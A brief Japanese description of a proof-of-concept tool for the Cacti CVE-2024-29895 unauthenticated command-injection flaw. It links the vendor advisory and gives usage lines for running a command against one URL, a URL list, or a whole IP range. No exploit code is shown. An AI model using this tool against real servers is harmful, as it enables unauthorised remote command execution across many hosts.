
Cacti CVE-2024-29895 の PoC
Cacti CVE-2024-29895 POC PHPのregister_argc_argvオプションがオンの場合、認証されていないユーザーがサーバー上で任意のコマンドを実行できるコマンドインジェクションの脆弱性です。
https://github.com/Cacti/cacti/security/advisories/GHSA-cr28-x256-xf5m
使用方法: app -m http://site.com/ -c whoami
または: app -w url_list.txt -c whoami
または: app -r 192.168.1.0/24 -c whoami